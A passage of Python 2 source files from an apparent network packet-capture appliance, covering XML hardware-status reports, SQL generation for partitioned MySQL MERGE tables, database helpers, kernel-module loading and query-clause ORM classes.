for card_number, card in cards.iteritems():
card_element = Element("card")
card_element.text = "\n" + (" " * 8)
self.add_child(card_element, "number", card.number, 8)
self.add_child(card_element, "model", card.model, 8)
self.add_child(card_element, "serial-number", card.serial_number, 8)
self.add_child(card_element, "mode", card.mode, 8)
port_element = None
for port in card.ports:
port_element = Element("port")
port_element.text = "\n" + (" " * 12)
child = self.add_child(port_element, "number", port.number, 12)
child = self.add_child(port_element, "time", port.status_time, 12)
child = self.add_child(port_element, "status", port.status, 12)
child = self.add_child(port_element, "speed", port.speed, 12)
child = self.add_child(port_element, "utilization", port.utilization, 12)
child = self.add_child(port_element, "dBm", port.dBm, 12)
child = self.add_child(port_element, "sfp", port.sfp, 12)
child = self.add_child(port_element, "fcsErrors", port.fcsErrors, 12)
child = self.add_child(port_element, "framesCount", port.framesCount, 12)
child = self.add_child(port_element, "framesDropped", port.framesDropped, 12)
child.tail = "\n" + (" " * 8) # correction
port_element.tail = "\n" + (" " * 8)
card_element.append(port_element)
if port_element:
port_element.tail = "\n" + (" " * 4) # correction
card_element.tail = "\n" + (" " * 4)
root_element.append(card_element)
card_element.tail = "\n" # correction
return xml.etree.ElementTree.tostring(root_element)
def add_child(self, element, tag, text, indent):
child = Element(tag)
child.text = text
child.tail = "\n" + (" " * indent)
element.append(child)
return child
def get_report(self, user, password):
report = self.get_napatech_card_report()
if report:
return report
cards = self.get_card_info(user, password)
if not cards:
return None
status = self.get_card_and_port_status(user, password)
if status is None:
return None
cards = self.merge(cards, status)
return self.build_report(cards)
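# Illustrative sketch (added for clarity; not part of the original script):
# get_report()/build_report() above produce indented XML shaped roughly like
# the following; element values are placeholders.
#
#   <hardware>
#     <vendor>BladeRocket</vendor>
#     <card>
#       <number>1</number>
#       <model>...</model>
#       <serial-number>...</serial-number>
#       <mode>...</mode>
#       <port>
#         <number>1</number>
#         <time>...</time>
#         <status>...</status>
#         <speed>...</speed>
#         <utilization>...</utilization>
#         <dBm>...</dBm>
#         <sfp>...</sfp>
#         <fcsErrors>...</fcsErrors>
#         <framesCount>...</framesCount>
#         <framesDropped>...</framesDropped>
#       </port>
#     </card>
#   </hardware>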
def get_napatech_card_report(self):
"""Return None if no napatech card is installed in the system."""
try:
status = self.service.getCardAndPortStatus(user, password)
#print status
if status.find("<card>Napatech-") == -1:
return None
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
root_element = Element("hardware")
root_element.text = "\n "
vendor = Element("vendor")
vendor.text = "Napatech"
vendor.tail = "\n "
root_element.append(vendor)
card_element = Element("card")
card_element.text = "\n" + (" " * 8)
self.add_child(card_element, "number", "1", 8)
tree = xml.etree.ElementTree.XML(status)
port_element = None
for port_status in tree.getiterator("portStatus"):
card = port_status.findtext("card")
if not card.startswith("Napatech-"):
continue
port_number = port_status.findtext("port")
port = Port(port_number)
for child in port_status.getiterator():
if child.tag == "time":
port.status_time = child.text
elif child.tag == "status":
port.status = child.text
elif child.tag == "speed":
port.speed = child.text
elif child.tag == "utilization":
port.utilization = child.text
elif child.tag == "dBm":
port.dBm = child.text
elif child.tag == "sfp":
port.sfp = child.text
elif child.tag == "fcsErrors":
port.fcsErrors= child.text
elif child.tag == "framesCount":
port.framesCount = child.text
elif child.tag == "framesDropped":
port.framesDropped = child.text
port_element = Element("port")
port_element.text = "\n" + (" " * 12)
child = self.add_child(port_element, "number", port.number, 12)
child = self.add_child(port_element, "time", port.status_time, 12)
child = self.add_child(port_element, "status", port.status, 12)
child = self.add_child(port_element, "speed", port.speed, 12)
child = self.add_child(port_element, "utilization", port.utilization, 12)
child = self.add_child(port_element, "dBm", port.dBm, 12)
child = self.add_child(port_element, "sfp", port.sfp, 12)
child = self.add_child(port_element, "fcsErrors", port.fcsErrors, 12)
child = self.add_child(port_element, "framesCount", port.framesCount, 12)
child = self.add_child(port_element, "framesDropped", port.framesDropped, 12)
child.tail = "\n" + (" " * 8) # correction
port_element.tail = "\n" + (" " * 8)
card_element.append(port_element)
if port_element:
port_element.tail = "\n" + (" " * 4) # correction
card_element.tail = "\n" + (" " * 4)
root_element.append(card_element)
card_element.tail = "\n" # correction
return xml.etree.ElementTree.tostring(root_element)
if __name__ == "__main__":
try:
pi = PI_API(url)
status = pi.get_report(user, password)
if status:
hwpath = os.path.join(tempfile.gettempdir(), "xt_hw_probe.txt")
f = open(hwpath, "w")
f.write(status)
f.close()
except urllib2.URLError as error:
# Most likely, no PI hardware. If hardware is present, could be because
# the web server is down.
print >> sys.stderr, error.args
except IOError as error:
print >> sys.stderr, error.args
```
#### File: PI-slim-napa/db/initPartitionTables.py
```python
totalPartitions = 2016
FILE = open("partitionTables.sql","w")
FILE.write("USE recd;\n")
def createTunnelTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
tunnelName = "tunnel_" + repr(partition);
str_list.append(tunnelName)
dropStmt = "DROP TABLE IF EXISTS " + tunnelName + ";\n"
createStmt = "CREATE TABLE " + tunnelName + " (id SERIAL , teid BIGINT UNSIGNED , call_trace_id BIGINT UNSIGNED , tunnel_ip_pair_id BIGINT UNSIGNED, interface_type TINYINT, start_time TIMESTAMP );\n"
alterStmt = "ALTER TABLE " + tunnelName + " ADD INDEX(start_time), ADD INDEX(call_trace_id), ADD INDEX(teid), ADD INDEX(tunnel_ip_pair_id), ADD INDEX(interface_type);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE tunnel (id SERIAL , teid BIGINT UNSIGNED , call_trace_id BIGINT UNSIGNED , tunnel_ip_pair_id BIGINT UNSIGNED, interface_type TINYINT, start_time TIMESTAMP ) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS tunnel;\n")
FILE.write(mergeStmt)
tunnelName="tunnel"
alterStmt = "ALTER TABLE " + tunnelName + " ADD INDEX(start_time), ADD INDEX(call_trace_id), ADD INDEX(teid), ADD INDEX(tunnel_ip_pair_id), ADD INDEX(interface_type);\n"
FILE.write(alterStmt)
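# Illustrative sketch (added for clarity; not part of the original script):
# with totalPartitions = 2, createTunnelTables() above would emit SQL along
# these lines (column lists elided here for brevity):
#
#   DROP TABLE IF EXISTS tunnel_1;
#   CREATE TABLE tunnel_1 (id SERIAL, teid BIGINT UNSIGNED, ...);
#   ALTER TABLE tunnel_1 ADD INDEX(start_time), ...;
#   DROP TABLE IF EXISTS tunnel_2;
#   CREATE TABLE tunnel_2 (...);
#   ALTER TABLE tunnel_2 ADD INDEX(start_time), ...;
#   DROP TABLE IF EXISTS tunnel;
#   CREATE TABLE tunnel (...) ENGINE=MERGE UNION=(tunnel_1,tunnel_2);
#   ALTER TABLE tunnel ADD INDEX(start_time), ...;
#
# The create*Tables() functions below follow the same drop/create/alter/merge
# pattern for their respective tables.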
def createCallTraceTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
callTraceName = "call_trace_" + repr(partition);
str_list.append(callTraceName)
dropStmt = "DROP TABLE IF EXISTS " + callTraceName + ";\n"
createStmt = "CREATE TABLE " + callTraceName + " (id SERIAL , start_time TIMESTAMP , msg_list_on_disk BIGINT UNSIGNED, ue_id BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + callTraceName + " ADD INDEX(start_time), ADD INDEX(ue_id);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE call_trace (id SERIAL , start_time TIMESTAMP , msg_list_on_disk BIGINT UNSIGNED, ue_id BIGINT UNSIGNED ) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS call_trace;\n")
FILE.write(mergeStmt)
callTraceName="call_trace"
alterStmt = "ALTER TABLE " + callTraceName + " ADD INDEX(start_time), ADD INDEX(ue_id);\n"
FILE.write(alterStmt)
def createCallTraceEndTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
callTraceEndName = "call_trace_end_" + repr(partition);
str_list.append(callTraceEndName)
dropStmt = "DROP TABLE IF EXISTS " + callTraceEndName + ";\n"
createStmt = "CREATE TABLE " + callTraceEndName + " (id SERIAL , reason INT, end_time TIMESTAMP);\n"
alterStmt = "ALTER TABLE " + callTraceEndName + " ADD INDEX(end_time);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE call_trace_end (id SERIAL, reason INT, end_time TIMESTAMP) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS call_trace_end;\n")
FILE.write(mergeStmt)
CallTraceEndName = "call_trace_end"
alterStmt = "ALTER TABLE call_trace_end ADD INDEX(end_time);\n"
FILE.write(alterStmt)
def createTunnelEndTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
tunnelEndName = "tunnel_end_" + repr(partition);
str_list.append(tunnelEndName)
dropStmt = "DROP TABLE IF EXISTS " + tunnelEndName + ";\n"
createStmt = "CREATE TABLE " + tunnelEndName + " (id SERIAL , reason INT, end_time TIMESTAMP, teid BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + tunnelEndName + " ADD INDEX(end_time), ADD INDEX(call_trace_id), ADD INDEX(teid);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE tunnel_end (id SERIAL, reason INT, end_time TIMESTAMP, teid BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS tunnel_end;\n")
FILE.write(mergeStmt)
tunnelEndName = "tunnel_end"
alterStmt = "ALTER TABLE " + tunnelEndName + " ADD INDEX(end_time), ADD INDEX(call_trace_id), ADD INDEX(teid);\n"
FILE.write(alterStmt)
def createUeIpPartitionTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
ueIpPartitionName = "ue_ip_part_" + repr(partition);
str_list.append(ueIpPartitionName)
dropStmt = "DROP TABLE IF EXISTS " + ueIpPartitionName + ";\n"
createStmt = "CREATE TABLE " + ueIpPartitionName + " (id SERIAL, ue_id BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED, is_ipv6 BOOL, ms_ip_addr BIGINT UNSIGNED, ls_ip_addr BIGINT UNSIGNED, interface_type TINYINT, detect_time TIMESTAMP, apn_id BIGINT UNSIGNED, bearer_id TINYINT);\n"
alterStmt = "ALTER TABLE " + ueIpPartitionName + " ADD INDEX(ue_id), ADD INDEX(call_trace_id), ADD INDEX(is_ipv6), ADD INDEX(ms_ip_addr), ADD INDEX(ls_ip_addr), ADD INDEX(interface_type), ADD INDEX(detect_time);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE ue_ip_part (id SERIAL, ue_id BIGINT UNSIGNED, call_trace_id BIGINT UNSIGNED, is_ipv6 BOOL, ms_ip_addr BIGINT UNSIGNED, ls_ip_addr BIGINT UNSIGNED, interface_type TINYINT, detect_time TIMESTAMP, apn_id BIGINT UNSIGNED, bearer_id TINYINT) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS ue_ip_part;\n")
FILE.write(mergeStmt)
ueIpPartitionName = "ue_ip_part"
alterStmt = "ALTER TABLE " + ueIpPartitionName + " ADD INDEX(ue_id), ADD INDEX(call_trace_id), ADD INDEX(is_ipv6), ADD INDEX(ms_ip_addr), ADD INDEX(ls_ip_addr), ADD INDEX(interface_type), ADD INDEX(detect_time);\n"
FILE.write(alterStmt)
def createIpFlowTables():
str_list = []
partition = 0
for index in range(totalPartitions):
partition = index + 1;
ipFlowPartitionName = "ip_flow_" + repr(partition);
str_list.append(ipFlowPartitionName)
dropStmt = "DROP TABLE IF EXISTS " + ipFlowPartitionName + ";\n"
createStmt = "CREATE TABLE " + ipFlowPartitionName + " (id SERIAL, start_time TIMESTAMP, end_time TIMESTAMP, hwport INT, src_is_ipv6 BOOL, ms_src_ip BIGINT UNSIGNED, ls_src_ip BIGINT UNSIGNED, dst_is_ipv6 BOOL, ms_dst_ip BIGINT UNSIGNED, ls_dst_ip BIGINT UNSIGNED, protocol INT, src_port INT, dst_port INT, ip_tos INT, src_bytes BIGINT UNSIGNED, dst_bytes BIGINT UNSIGNED, src_frames BIGINT UNSIGNED, dst_frames BIGINT UNSIGNED, prev BOOL, next BOOL, t1 TIMESTAMP, t2 TIMESTAMP, vlan INT UNSIGNED, val1 BIGINT UNSIGNED, val2 BIGINT UNSIGNED, val3 BIGINT UNSIGNED, val4 BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + ipFlowPartitionName + " ADD INDEX(start_time), ADD INDEX(end_time), ADD INDEX(ms_src_ip), ADD INDEX(ls_src_ip), ADD INDEX(ms_dst_ip), ADD INDEX(ls_dst_ip), ADD INDEX(protocol), ADD INDEX(src_port), ADD INDEX(dst_port), ADD INDEX(vlan), ADD INDEX(val4);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE ip_flow (id SERIAL, start_time TIMESTAMP, end_time TIMESTAMP, hwport INT, src_is_ipv6 BOOL, ms_src_ip BIGINT UNSIGNED, ls_src_ip BIGINT UNSIGNED, dst_is_ipv6 BOOL, ms_dst_ip BIGINT UNSIGNED, ls_dst_ip BIGINT UNSIGNED, protocol INT, src_port INT, dst_port INT, ip_tos INT, src_bytes BIGINT UNSIGNED, dst_bytes BIGINT UNSIGNED, src_frames BIGINT UNSIGNED, dst_frames BIGINT UNSIGNED, prev BOOL, next BOOL, t1 TIMESTAMP, t2 TIMESTAMP, vlan INT UNSIGNED, val1 BIGINT UNSIGNED, val2 BIGINT UNSIGNED, val3 BIGINT UNSIGNED, val4 BIGINT UNSIGNED) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS ip_flow;\n")
FILE.write(mergeStmt)
ipFlowPartitionName = "ip_flow"
alterStmt = "ALTER TABLE " + ipFlowPartitionName + " ADD INDEX(start_time), ADD INDEX(end_time), ADD INDEX(ms_src_ip), ADD INDEX(ls_src_ip), ADD INDEX(ms_dst_ip), ADD INDEX(ls_dst_ip), ADD INDEX(protocol), ADD INDEX(src_port), ADD INDEX(dst_port), ADD INDEX(vlan), ADD INDEX(val4);\n"
FILE.write(alterStmt)
createTunnelTables()
createCallTraceTables()
createCallTraceEndTables()
createTunnelEndTables()
createUeIpPartitionTables()
createIpFlowTables()
FILE.write("FLUSH TABLES;\n")
FILE.close()
print "Finished writing to partitionTables.sql"
```
#### File: PI-slim-napa/db/mysql_migrate.py
```python
from warnings import filterwarnings
import MySQLdb
import MySQLdb.cursors
# Suppress Warnings. We have all the exceptions covered.
filterwarnings('ignore', category = MySQLdb.Warning)
#start sql helper functions
def open_db(options, dictcursor=None):
if options.unit_test == True:
db_name=options.testdbname
else:
db_name=options.dbname
if not dictcursor:
return MySQLdb.connect(options.dbhostname, options.dbusername, options.dbpassword, db_name)
return MySQLdb.connect(options.dbhostname, options.dbusername, options.dbpassword, db_name, cursorclass=dictcursor)
def db_execute(options, sql, catch_error=False, print_error=False):
db = open_db(options)
cursor = db.cursor()
try:
# Execute the SQL command
cursor.execute(sql)
db.commit()
return cursor.lastrowid # last affected row id
except Exception as e:
db.rollback()
if catch_error:
if print_error: print 'db_execute caught exception: %s'%str(e)
else:
raise # Raise the exception
finally:
# close the cursor and commit the transaction
cursor.close()
db.close()
def db_fetch_next_row(options, sql):
# Open database connection
db = open_db(options)
# prepare a cursor object using cursor() method
cursor = db.cursor()
row = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception: # Try to shutdown gracefully
pass
#logger.error('fetch next row Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if row is not None:
return row
else:
return (None,)
def db_fetch_remaining_rows(options, sql):
# Open database connection
db = open_db(options)
# prepare a cursor object using cursor() method
cursor = db.cursor()
rows = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
rows = cursor.fetchall()
except Exception:
pass
#logger.error('fetch remaining rows Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if rows is not None:
return rows
else:
return (None,)
def db_fetch_next_row_dict(options, sql):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
row = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception:
pass
#logger.error('fetch next row dict Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if row is not None:
return row
else:
return (None,)
def db_fetch_remaining_rows_dict(options, sql):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
rows = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
rows = cursor.fetchall()
except Exception:
pass
#logger.error('fetch remaining rows dict Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if rows is not None:
return rows
else:
return (None,)
def db_fetch_col_by_string(options, sql, index):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception:
pass
#logger.error('fetch col by string Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
#check for key membership
try:
if row.has_key(index):
return row[index]
except Exception:
pass
#logger.error('fetch col by string Caught Exception: %s.\t\t' % (str(e),))
return 0
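if __name__ == '__main__':
    # Illustrative sketch (added for clarity; not part of the original module):
    # the helpers above expect an "options" object exposing the connection
    # attributes read by open_db(). Every value below is a placeholder, and a
    # reachable MySQL server is required; connection failures raise from
    # open_db() itself.
    class _ExampleOptions(object):
        dbhostname = 'localhost'
        dbusername = 'user'
        dbpassword = 'password'
        dbname = 'recd'
        testdbname = 'recd_test'
        unit_test = False
    opts = _ExampleOptions()
    print db_fetch_next_row(opts, 'SELECT 1')
    db_execute(opts, 'SELECT 1', catch_error=True, print_error=True)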
```
#### File: recdopt_py/common/kernel.py
```python
import os, sys, logging, subprocess
log = logging.getLogger('recd')
from sys_utils import SysUtils
kernel_folder = '/opt/MassTransit/kernel'
class KernelModule(object):
def __init__(self, module, args=''):
self.module = module
self.args = args
self.last_output = None
def installed(self):
self.last_output = SysUtils.run_command('lsmod | grep %s'%(self.module))
return len(self.last_output['stdout']) > 0
def uninstall(self, force=False):
if force:
self.last_output = SysUtils.run_command('rmmod -f %s'%(self.module))
else:
self.last_output = SysUtils.run_command('rmmod %s'%(self.module))
return not self.installed()
def reinstall(self):
self.uninstall()
return self.install()
def install(self):
if self.installed(): return True
self.last_output = SysUtils.run_command('insmod %s/%s.ko %s'%(kernel_folder,self.module,self.args))
return len(self.last_output['stdout']) == 0 and len(self.last_output['stderr']) == 0
if __name__ == "__main__":
# print to stdout
log.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
log.addHandler(streamHandler)
log.info("Kernel Unit Test")
pf_ring = KernelModule('pf_ring')
ixgbe = KernelModule('ixgbe','adapters_to_enable=00:E0:ED:FF:D0:06,00:E0:ED:FF:D0:07 mtu=9000')
ixgbe.uninstall()
pf_ring.uninstall()
log.info('install: ' + str(pf_ring.install()))
log.info('install: ' + str(ixgbe.install()))
log.info('last out: ' + str(ixgbe.last_output))
```
#### File: recdopt_py/common/os_utils.py
```python
import os
from shutil import rmtree
class OSUtils(object):
# Makes a directory
@staticmethod
def make_dir(dir,logger=None):
try:
if not os.path.exists(dir):
if logger: logger.info("Creating directory: %s" % dir)
os.makedirs(dir)
except OSError, e:
if logger: logger.error("Error creating directory: %s. Error: %s" % (dir, e,))
return False
return True
# Removes a directory
@staticmethod
def remove_dir(dir,logger=None):
if logger: logger.info("Removing directory: %s" % dir )
rmtree(dir, ignore_errors=True)
# Removes a file and handles thrown exceptions
@staticmethod
def remove_file(file,logger=None):
try:
if logger: logger.info("Removing file: %s" % file )
os.remove( file )
except OSError, e:
pass # ignore errors
@staticmethod
def freespace(dir,reserve=0.0):
try:
s = os.statvfs(dir)
space = s.f_bsize * s.f_bavail
space -= OSUtils.disk_size(dir)*reserve # shave off a percentage
return max(0,space)
except Exception as e:
# Ignore error. Zero is worst case
return 0
@staticmethod
def disk_size(dir):
try:
s = os.statvfs(dir)
return s.f_bsize * s.f_blocks
except Exception as e:
# Ignore error. Zero is worst case
return 0
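if __name__ == "__main__":
    # Illustrative sketch (added for clarity; not part of the original module):
    # exercises the helpers above on a throwaway directory. The reserve value of
    # 0.05 (keep 5% of the disk size in reserve) is an arbitrary example.
    example_dir = "/tmp/os_utils_example"
    OSUtils.make_dir(example_dir)
    print "disk size: %d bytes" % OSUtils.disk_size(example_dir)
    print "free space (5%% reserve): %d bytes" % OSUtils.freespace(example_dir, reserve=0.05)
    OSUtils.remove_dir(example_dir)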
```
#### File: recdopt_py/common/rolling_counter.py
```python
class RollingCounter(object):
def __init__(self, roll_on):
self.roll_on = roll_on
self.count = 0
def step(self):
self.count += 1
if self.count < self.roll_on:
return False
self.count = 0
return True
if __name__ == "__main__":
import sys
print "RollingCounter Unit Test"
counter = RollingCounter(10)
for i in range(9):
if counter.step() is True:
print "Failed on step %d"%i
sys.exit()
if counter.step() is False:
print "Failed on step 10"
if counter.step() is True:
print "Failed on step 11"
print "All Tests Passed"
```
#### File: recdopt_py/db/download_clause.py
```python
import time, calendar, logging
from common.time_utils import TimeUtils
from common.c_utils import CUtils
import recdopt_context
from recdopt_context import *
from storm.locals import *
log = logging.getLogger('recd')
class DownloadClauseField(Storm):
__storm_table__ = "download_clause_field"
id = Int(primary=True)
description = Unicode()
class DownloadClauseType(Storm):
__storm_table__ = "download_clause_type"
id = Int(primary=True)
description = Unicode()
class DownloadClause(Storm):
__storm_table__ = "download_clause"
id = Int(primary=True)
download_id = Int()
download = Reference(download_id, 'Download.id')
parent_id = Int()
download_clause_field_id = Int()
download_clause_field = Reference(download_clause_field_id, 'DownloadClauseField.id')
download_clause_type_id = Int()
download_clause_type = Reference(download_clause_type_id, 'DownloadClauseType.id')
parameter = Unicode()
str = ''
def __str__(self): return self.str
# Special hook that is called when this object is loaded from the database
def __storm_loaded__(self):
# The QUERY type references the download table whereas every other type is a reference to another clause
if self.download_clause_type.description == "QUERY":
setattr(self.__class__, 'parent', Reference(DownloadClause.parent_id, 'Download.id'))
else:
setattr(self.__class__, 'parent', Reference(DownloadClause.parent_id, 'DownloadClause.id'))
self.str = "Clause %3d: " % (self.id)
# Debug Printing
if self.download_clause_type.description == "QUERY":
self.str += "QUERY"
elif self.download_clause_type.description == "AND":
self.str += " AND"
elif self.download_clause_type.description == "OR":
self.str += " OR"
elif self.download_clause_type.description == "NOT":
self.str += " NOT"
elif self.download_clause_type.description == "ALL":
self.str += " ALL"
elif self.download_clause_type.description == "GREATERTHAN":
self.str += " " + self.download_clause_field.description + " > " + self.parameter
elif self.download_clause_type.description == "LESSTHAN":
self.str += " " + self.download_clause_field.description + " < " + self.parameter
elif self.download_clause_type.description == "EQUALTO":
self.str += " " + self.download_clause_field.description + " == " + self.parameter
else:
self.str += " " + self.download_clause_field.description + " " + self.download_clause_type.description + " " + self.parameter
# Recursive load childen of this object
def load_tree(self, store):
QUERY_TYPE = store.find(DownloadClauseType, DownloadClauseType.description == u'QUERY').one()
# Find any clause that is not a query
self.children = store.find(DownloadClause, DownloadClause.parent_id == self.id, DownloadClause.download_clause_type_id != QUERY_TYPE.id)
for child in self.children: child.load_tree(store)
# This class builds a list of dict objects for the download id
# Changing these values will not update the database. It is meant as a view only class
class DownloadClauseList(list):
def __init__(self,options,database,download_id):
self.options = options
self.store = Store(database)
self.download_id = download_id
self.error = ''
self.valid = False
self.impossible_query = False
query = self.store.find(DownloadClause, DownloadClause.parent_id == self.download_id,
DownloadClause.download_clause_type_id == 1).one()
if query is None:
self.error = "No download_clause found"
log.warning(self.error)
return
# Recursive build the tree from each layer of clauses. Only be 3 levels deep at most.
try:
query.load_tree(self.store)
# These children are "AND"s
for k in query.children:
clause = dict()
# Build a dict for each group and append it to the list
for i in k.children:
clause[i.download_clause_field.description] = str(i.parameter)
#log.info(str(i))
self.append(clause)
except Exception as e:
            self.error = 'The download_clause tree is invalid: ' + str(e)
log.warning(self.error)
return
# Figure out min and max time
min_time = None
max_time = None
alt_min_time = None
alt_max_time = None
for clause in self:
if not (clause.has_key("TEID") and not clause.has_key("CALLID")):
(min_time, max_time) = self.get_min_max_time(clause, min_time, max_time)
else:
(alt_min_time, alt_max_time) = self.get_min_max_time(clause, alt_min_time, alt_max_time)
# Check for SART request
if min_time is None or max_time is None:
(min_time, max_time) = (alt_min_time, alt_max_time)
if max_time == None:
max_time = calendar.timegm(time.gmtime())
# Impossible Query Handling
if min_time != None and max_time != None:
ds_start_time = recdopt.recdopt_get_begin_time()
ds_end_time = recdopt.recdopt_get_end_time()
            # Check that this is not completely outside the data store time range
if min_time < ds_end_time and max_time > ds_start_time:
# Fix the times in hw mode so they only search within the data store time
if self.options.acq_type != 'sw':
if min_time < ds_start_time:
log.info("Start time prior to data store start time. moving start time")
min_time = ds_start_time
if max_time > ds_end_time:
log.info("End time after data store end time. moving end time")
max_time = ds_end_time
self.impossible_query = False
else:
self.error = "Search range outside data store range: \nData Store Range: %s -> %s. \nSearch Range: %s -> %s" % \
( TimeUtils.seconds_to_time_str(ds_start_time), TimeUtils.seconds_to_time_str(ds_end_time), \
TimeUtils.seconds_to_time_str(min_time), TimeUtils.seconds_to_time_str(max_time),)
log.warning(self.error.replace('\n','')) # don't print line breaks in the log. line breaks are for the GUI
self.impossible_query = True
# Set instance variables
self.valid = bool((min_time and max_time) and not self.impossible_query)
if not (min_time and max_time):
self.error = 'Could not determine minimum or maximum time'
self.min_time = min_time
self.max_time = max_time
def get_min_max_time(self,clause,min_time,max_time):
if clause.has_key("STARTTIME"):
if clause["STARTTIME"] != '0000-00-00 00:00:00' and clause["STARTTIME"] != '':
if min_time == None or TimeUtils.time_str_to_seconds(clause["STARTTIME"]) < min_time:
min_time = TimeUtils.time_str_to_seconds(clause["STARTTIME"])
else:
log.info("No start time for Call")
else:
log.info("No start time for Call ID")
if clause.has_key("ENDTIME"):
# SAB NOTE: A null or zero end time means we should search up until the current time.
if clause["ENDTIME"] == '' or clause["ENDTIME"] == '0000-00-00 00:00:00':
max_time = calendar.timegm(time.gmtime())
else:
if max_time == None or TimeUtils.time_str_to_seconds(clause["ENDTIME"]) > max_time:
max_time = TimeUtils.time_str_to_seconds(clause["ENDTIME"])
else:
max_time = calendar.timegm(time.gmtime())
return (min_time, max_time)
# Creates the open query clause for user plane and control plane
class OpenQueryClause(object):
def __init__(self,clause_list,start_time,end_time):
head = ctypes.POINTER(OPEN_QUERY_CLAUSE)()
cp_head = ctypes.POINTER(CALL_AGGREGATE_REQUEST)()
cp_head.next = None
count = 0
cp_count = 0
teid_counter = 0
cp_call_serial_dict = dict() # used to avoid duplicate call serial numbers in cp retrieval
# Loop over all the clauses
for clause in clause_list:
# If the clause falls outside of this interval, no sense using it as part of this search
if clause.has_key("ENDTIME") and clause["ENDTIME"] != '0000-00-00 00:00:00' and clause['ENDTIME'] != '':
if TimeUtils.time_str_to_seconds(clause["ENDTIME"]) < start_time:
continue
if clause.has_key("STARTTIME") and clause["STARTTIME"] != '0000-00-00 00:00:00' and clause['STARTTIME'] != '':
if TimeUtils.time_str_to_seconds(clause["STARTTIME"]) > end_time:
continue
query_clause = OPEN_QUERY_CLAUSE()
query_clause.call_id = 0
query_clause.teid = 0
query_clause.start_time = ""
query_clause.end_time = ""
query_clause.interfaces = ""
query_clause.src_ip = ""
query_clause.dst_ip = ""
query_clause.src_port = ""
query_clause.dst_port = ""
query_clause.any_port = ""
query_clause.protocol = ""
query_clause.ueip = ""
query_clause.vlan = ""
query_clause.mpls = ""
query_clause.ipoptions = 9
if clause.has_key("TEID"):
query_clause.teid = int(clause["TEID"])
if query_clause.teid > 0: teid_counter+=1
if clause.has_key("CALLID"):
query_clause.call_id = int(clause["CALLID"])
# Expand the start time based on the interval start passed in
if clause.has_key("STARTTIME") and clause["STARTTIME"] != '0000-00-00 00:00:00' and clause["STARTTIME"] != '':
max_start = max(start_time, TimeUtils.time_str_to_seconds(clause["STARTTIME"]))
query_clause.start_time = TimeUtils.seconds_to_time_str(max_start)
else:
query_clause.start_time = TimeUtils.seconds_to_time_str(start_time)
